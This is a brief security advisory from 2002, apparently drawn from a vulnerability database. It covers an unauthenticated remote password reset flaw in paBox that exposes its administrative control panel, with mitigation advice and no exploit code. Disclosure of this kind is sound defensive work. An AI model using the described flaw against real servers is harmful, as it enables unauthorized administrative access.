vendor: paBox
by: SecurityFocus
CVSS: 7.5 (HIGH)
Unauthenticated Remote Password Reset
CWE: 287
Product Name: paBox
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002
paBox Unauthenticated Remote Password Reset
paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel. An attacker can exploit this issue by sending a specially crafted HTTP request to the vulnerable server.
Mitigation:
Administrators are advised to disable the 'admin.php' script or restrict access to it.